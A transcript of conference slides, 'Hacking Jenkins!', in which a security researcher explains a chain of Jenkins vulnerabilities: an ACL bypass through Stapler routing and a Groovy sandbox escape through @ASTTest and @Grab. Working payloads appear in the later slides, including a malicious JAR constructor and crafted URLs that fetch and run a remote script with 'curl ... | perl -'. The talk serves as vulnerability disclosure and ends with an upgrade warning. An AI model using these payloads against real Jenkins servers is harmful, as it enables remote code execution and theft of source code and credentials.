Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to...

103
Hacking Jenkins! Orange Tsai

Transcript of Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to...

Page 1: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Hacking Jenkins!Orange Tsai

Page 2: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

• Come from Taiwan

• Principal security researcher at DEVCORE

• Speaker at Black Hat US/ASIA, DEFCON, HITB, CODEBLUE…

• CTF player (Captain of HITCON CTF team and member of 217)

• Bounty hunter (Found RCE on Facebook, GitHub, Twitter, Uber…)

Orange Tsai

orange_8361

Page 3: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Outline

• Introduction & architecture

• The vulnerability root cause & how to exploit

1. ACL bypass vulnerability

2. Sandbox escape vulnerability

• Evolution of the exploit

Page 4: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

What is JenkinsA famous CI/CD service

Page 5: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

What is CI/CDContinuous Integration and Continuous Delivery

Page 6: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Why JenkinsHacker-friendly

Page 7: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

JVM ecosystem report 2018

https://snyk.io/blog/jvm-ecosystem-report-2018/

Page 8: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins for hackers

• Lots of

• source code

• credential / GitHub token

• computer node(Intranet!!!)

Page 9: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 10: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 11: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 12: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 13: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Common attack vectors

• Login portal

• Known vulnerabilities

Page 14: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Common attack vectors

• Login portal

• Known vulnerabilities

Page 15: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 16: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Common attack vectors

• Login portal

• Known vulnerabilities

Page 17: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Past deserialization bugs on Jenkins

Page 18: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Past deserialization bugs on Jenkins• CVE-2015-8103 - The first deserialization bug

• CVE-2016-0788- Bypass the blacklist by the JRMP gadget

• CVE-2016-0792 - Bypass the blacklist by the XStream

• CVE-2016-9299 - Bypass the blacklist by the LDAP gadget

• CVE-2017-1000353 - Bypass the blacklist by the SignedObject…

Page 19: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins remoting 2.54

CVE-2015-8103

Page 20: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins remoting 2.55CVE-2016-0788

Page 21: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins remoting 3.2CVE-2016-9299

Page 22: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins remoting 3.28

CVE-2017-1000353

Page 23: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins is so angry that rewrite all the serialization protocol

into a new HTTP-based protocol

Page 24: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

No deserialization anymoreThere is no more pre-auth RCE in Jenkins core since 2017

Page 25: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Discover new one

Page 26: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Reviewing scopes1. Jenkins core

2. Stapler framework

3. Default plugins

Page 27: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

CVEs

1. CVE-2018-1000600 - CSRF and missing permission checks in GitHub Plugin

2. CVE-2018-1000861 - Code execution through crafted URLs

3. CVE-2018-1999002 - Arbitrary file read vulnerability

4. CVE-2018-1999046 - Unauthorized users could access agent logs

5. CVE-2019-1003000 - Sandbox Bypass in Script Security and Pipeline Plugins

6. CVE-2019-1003001 - Sandbox Bypass in Script Security and Pipeline Plugins

7. CVE-2019-1003002 - Sandbox Bypass in Script Security and Pipeline Plugins

Page 28: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Review Java web

• Where is the configuration?

• Where is the library?

• Where is the application code?

• Where is the entry point?

ROOT/

├── index.jsp

├── robots.txt

└── WEB-INF

├── classes

│ └── HelloWorld.class

├── lib

│ └── servlet-api.jar

└── web.xml

<servlet><servlet-name>Stapler</servlet-name><servlet-class>org.kohsuke.stapler.Stapler</servlet-class>

</servlet>…<servlet-mapping>

<servlet-name>Stapler</servlet-name><url-pattern>/*</url-pattern>

</servlet-mapping>

Jenkins/war/src/main/webapp/WEB-INF/web.xml

Page 29: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins dynamic routing

Page 30: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Routing rules

<token>

get<token>()

get<token>(String)

get<token>(Int)

get<token>(Long)

get<token>(StaplerRequest)

getDynamic(String, …)

doDynamic(…)

do<token>(…)

js<token>(…)

@WebMethod annotation

@JavaScriptMethod annotation

Page 31: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Method Chain

jenkins.model.Jenkins.getFoo()

.getBar(1)

.getBaz("orange")

http://jenkins/foo/bar/1/baz/orange

Page 32: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

CVE-2018-1000861Code execution through crafted URLs

Routing Access Control List Bypass

Bypass Overall/Read permission

Page 33: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

What's wrong with that?Here are two problems

Page 34: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

First problemEvery class in Java inherits Object class, except Object itself

Page 35: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

jenkins.model.Jenkins.getClass()

.getClassLoader()

.getResource("index.jsp")

.getContent()

http://jenkins/class/classLoader

/resource/index.jsp/content

Page 36: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

jenkins.model.Jenkins

.getClass()

.getClassLoader()

.getResource("index.jsp")

.getContent()

1. get<token>()

2. get<token>(String)

3. get<token>(Int)

4. get<token>(Long)

5. get<token>(StaplerRequest)

6. getDynamic(String, …)

7. doDynamic(…)

8. do<token>(…)

9. ……

public final Class<?> getClass()

java.lang.Object

Page 37: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

public ClassLoader getClassLoader()

java.lang.Class

1. get<token>()

2. get<token>(String)

3. get<token>(Int)

4. get<token>(Long)

5. get<token>(StaplerRequest)

6. getDynamic(String, …)

7. doDynamic(…)

8. do<token>(…)

9. ……

jenkins.model.Jenkins

.getClass()

.getClassLoader()

.getResource("index.jsp")

.getContent()

Page 38: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

public URL getResource(String name)

java.lang.ClassLoader

1. get<token>()

2. get<token>(String)

3. get<token>(Int)

4. get<token>(Long)

5. get<token>(StaplerRequest)

6. getDynamic(String, …)

7. doDynamic(…)

8. do<token>(…)

9. ……

jenkins.model.Jenkins

.getClass()

.getClassLoader()

.getResource("index.jsp")

.getContent()

Page 39: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

public final Object getContent()

java.net.URL

1. get<token>()

2. get<token>(String)

3. get<token>(Int)

4. get<token>(Long)

5. get<token>(StaplerRequest)

6. getDynamic(String, …)

7. doDynamic(…)

8. do<token>(…)

9. ……

jenkins.model.Jenkins

.getClass()

.getClassLoader()

.getResource("index.jsp")

.getContent()

Page 40: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Second problemURL prefix whitelist bypass

Page 41: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

URL whitelists by default

Page 42: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

URL whitelists by default

jenkins.model.Jenkins.doLogout(…)

http://jenkins/logout

Page 43: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

jenkins.model.Jenkins

.getSearch()

http://jenkins/search?q=

403 Forbidden

Page 44: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

What if there is a whitelisted method returns a Search object?

Page 45: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

URL whitelists by default

Page 46: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

http://jenkins/securityRealm/

public SecurityRealm getSecurityRealm()

Jenkins.model.Jenkins

jenkins.model.Jenkins

.getSecurityRealm()

Page 47: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

http://jenkins/securityRealm/user/[name]/

public User getUser(String id)

Jenkins.model.HudsonPrivateSecurityRealm

jenkins.model.Jenkins

.getSecurityRealm()

.getUser([name])

Page 48: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

http://jenkins/securityRealm/user/[name]/search

public Search getSearch()

Jenkins.model.AbstractModelObject

jenkins.model.Jenkins

.getSecurityRealm()

.getUser([name])

.getSearch()

Page 49: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 50: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Jenkins checks the permission again before most of dangerous methods

It's sad

Page 51: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

http://jenkins/script

Page 52: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Maximize the severityEscalate to a pre-auth information leakage √

Escalate to a pre-auth Server Side Request Forgery √

Escalate to a pre-auth Remote Code Execution ?

Page 53: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Remote Code Execution• CVE-2018-1000861 - Code execution through crafted URLs

• CVE-2019-1003000 - Sandbox Bypass in Script Security Plugins

Page 54: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

What is PipelinePipeline is a script to help developers more easier to write scripts

for software building, testing and delivering!

Page 55: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Pipeline is a DSLWhich built with Groovy

Page 56: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Pipeline syntax checkhttp://jenkins/descriptorByName

/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition

/checkScriptCompile?value=[Pipeline here]

Page 57: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

If you are the programmerHow do you implement this syntax-error-checking function?

Page 58: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

As I said beforePipeline is a DSL built with Groovy

Page 59: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

No execute(), only AST parse

Page 60: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Nothing happened :(this.class.classLoader.parseClass('''

java.lang.Runtime.getRuntime().exec("touch pwned")

''');

Page 61: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

I failed to exploit beforeBut in this time, Meta-Programming flashed in my mind

Page 62: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Meta-Programming isWrite programs that operate on other programs

• Compiler• Preprocessor• Interpreter• Linker• …

Page 63: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Two type• compile-time

• Run-time

Page 64: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

compile-time Meta-Programming

• Operate the program during compiler/parsing time

• C Macro

• C++ Template

• Java Annotation

• DSL

• …$ gcc test.c –c && ls –size -h test.o

2GB test.o

Page 65: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

compile-time Meta-Programming

• Operate the program during compiler/parsing time

• C Macro

• C++ Template

• Java Annotation

• DSL

• …

Fibonacci number

Page 66: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

compile-time Meta-Programming

• Operate the program during compiler/parsing time

• C Macro

• C++ Template

• Java Annotation

• DSL

• …

Page 67: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Groovy Meta-ProgrammingPipeline is a DSL built with Groovy

Page 68: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Reading…

Page 69: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

@ASTTestWhat the hell is that

Page 70: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

@ASTTest@ASTTest is a special AST transformation meant to help debugging other AST

transformations or the Groovy compiler itself. It will let the developer “explore”

the AST during compilation and perform assertions on the AST rather than on

the result of compilation. This means that this AST transformations gives

access to the AST before the bytecode is produced. @ASTTest can be placed

on any annotable node and requires two parameters:

Page 71: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

@ASTTest@ASTTest(phase=CONVERSION, value={

assert node instanceof ClassNode

assert node.name == 'Person'

})

class Person {}

Page 72: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Let's try that in localthis.class.classLoader.parseClass('''

@groovy.transform.ASTTest(value={

assert java.lang.Runtime.getRuntime().exec("touch pwned")

})

class Person {}

''');

Page 73: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Let's try that in local$ ls

poc.groovy

$ groovy poc.groovy

$ ls

poc.groovy pwned

Page 74: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

While reproducing it on remote…It shows

What the hell is that

Page 75: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Root cause analysis

• Pipeline Shared Groovy Libraries Plugin

• A plugin for importing customized libraries into Pipeline

• Jenkins loads your customized library before every Pipeline execute

• The root cause is - during compile-time, there is no

corresponded library in classPath

Page 76: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

How to fixAsk admin to uninstall the plugin

Page 77: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

How to fixAsk admin to uninstall the plugin

Page 78: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

@Grab@Grab(group='commons-lang', module='commons-lang', version='2.4')

import org.apache.commons.lang.WordUtils

println "Hello ${WordUtils.capitalize('world')}"

Page 79: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

@GrabResolve@GrabResolver(name='restlet', root='http://maven.restlet.org/')

@Grab(group='org.restlet', module='org.restlet', version='1.1.6')

import org.restlet

Page 80: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

@GrabResolve@GrabResolver(name='restlet', root='http://malicious.com/')

@Grab(group='org.restlet', module='org.restlet', version='1.1.6')

import org.restlet

Page 81: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Oh, it works220.133.114.83 - - [18/Dec/2018:18:56:54 +0800] "HEAD

/org/restlet/org.restlet/1.1.6/org.restlet-1.1.6.jar

HTTP/1.1" 404 185 "-" "Apache Ivy/2.4.0"

Page 82: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Import arbitrary JARBut how to get code execution?

Page 83: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Dig deeper into @GrabWe start to review the Groovy implementation

Page 84: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

groovy.grape.GrapeIvy

Page 85: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

groovy.grape.GrapeIvy

Page 86: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

YesWe can poke the Constructor on any class!

Page 87: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Chain all together

Page 88: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Prepare the malicious JARpublic class Orange {

public Orange() {

try {

String payload = "curl malicious/bc.pl | perl -";

String[] cmds = {"/bin/bash", "-c", payload};

java.lang.Runtime.getRuntime().exec(cmds);

} catch (Exception e) { }

}}

Page 89: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Prepare the malicious JAR$ javac Orange.java

$ mkdir -p META-INF/services/

$ echo Orange >META-INF/services/org.codehaus.groovy.plugins.Runners

$ find –type f

./Orange.java

./Orange.class

./META-INF/services/org.codehaus.groovy.plugins.Runners

$ jar cvf poc-1.jar tw/

$ cp poc-1.jar ~/www/tw/orange/poc/1/

$ curl -I http://[host]/tw/orange/poc/1/poc-1.jar

Page 90: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Attacking remote Jenkins!

http://jenkins/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile

?value=

@GrabConfig(disableChecksums=true)%0a

@GrabResolver(name='orange.tw', root='http://evil/')%0a

@Grab(group='tw.orange', module='poc', version='1')%0a

import Orange;

Page 91: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Demohttps://youtu.be/abuH-j-6-s0

Page 92: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Survey on Shodan

• It is about 75000 Jenkins servers in the wild• $ cat versions | sort | uniq -c | sort -n | less

• 1933 - Jenkins: 2.107.3• 1577 - Jenkins: 2.60.3• 1559 - Jenkins: 2.107.2• 1348 - Jenkins: 2.89.4• 1263 - Jenkins: 2.155• 1095 - Jenkins: 2.153• 1012 - Jenkins: 2.107.1• 958 - Jenkins: 2.89.3

11750- Jenkins: 2.150.15473 - Jenkins: 2.138.34583 - Jenkins: 2.121.34534 - Jenkins: 2.138.23389 - Jenkins: 2.1562987 - Jenkins: 2.138.12530 - Jenkins: 2.121.12422 - Jenkins: 2.121.2

Page 93: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Survey on Shodan

• We suppose all installed the suggested plugins

• Enable Overall/Read are vulnerable

• Disable Overall/Read

• Version > 2.138 can be chained with the ACL bypass vulnerability

• It's about 45000/75000 vulnerable Jenkins we can hack

Page 94: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Evolution of the exploit

2019-01-08CVE-2019-1003000

Sandbox escape fixed(classLoader.parseClass)

2018-12-05

CVE-2018-1000861 ACL bypass fixed

2019-01-16

Release the blog Hacking Jenkins part-1

2019-01-28CVE-2019-1003005

Another path to reach the syntax validation fixed(GroovyShell.parse)

2019-02-19

Release the blog Hacking Jenkins part-2

and the RCE chain

@orange_8361

@orange_8361

@orange_8361

@0ang3el

@orange_8361

2019-03-06CVE-2019-1003029

Another sandbox escape in GroovyShell.parse fixed

@webpentest

Page 95: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Evolution of the exploit

• Original entry (based on classLoader.parseClass)

• Meta programming is still required to obtain code execution

• New entry found by @0ang3el (based on GroovyShell.parse)

• A more universal entry

• The new entry is based on a higher level Groovy API

• With more features added compared to the original API, @webpentest

found an easier way to escape the sandbox!

Page 96: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

More reliable exploit chainhttp://jenkins/securityRealm/user/admin/descriptorByName/

org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.Secur

eGroovyScript/checkScript

?sandbox=true

&value=public class poc {

public poc() { "curl orange.tw/bc.pl | perl -".execute() }

}

CVE-2019-1003029 by @webpentestCVE-2019-1003005 by @0ang3elCVE-2018-1000861 by @orange_8361

Page 97: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

awesome-jenkins-rce-2019

Page 98: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 99: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 100: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 101: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)
Page 102: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

Upgrade your Jenkins ASAP

Page 103: Hacking Jenkins! - Hack In The Box Security Conference · •Meta programming is still required to obtain code execution •New entry found by @0ang3el (based on GroovyShell.parse)

orange_8361

[email protected]

Thanks!

https://blog.orange.tw